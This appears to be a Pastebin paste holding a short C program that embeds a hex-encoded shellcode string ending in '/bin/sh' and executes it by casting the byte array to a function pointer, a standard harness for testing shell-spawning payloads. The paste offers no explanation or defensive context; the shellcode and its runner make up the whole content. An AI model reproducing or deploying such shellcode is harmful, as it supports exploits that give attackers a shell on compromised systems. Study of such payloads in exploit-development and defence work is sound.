Guest User

Untitled

a guest
Jul 17th, 2018
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.18 KB | None | 0 0
  1. char code[]="\x6a\x26\xff\xbf\x2a\x04\x0e\x74"
  2. "\x42\x2e\x61\x1e\xe3\x65\xe3\x66"
  3. "\x0b\xe3\x19\xc3/bin/sh";
  4. int main()
  5. {
  6. ((void (*)(void))code)();
  7. }
Add Comment
Please, Sign In to add comment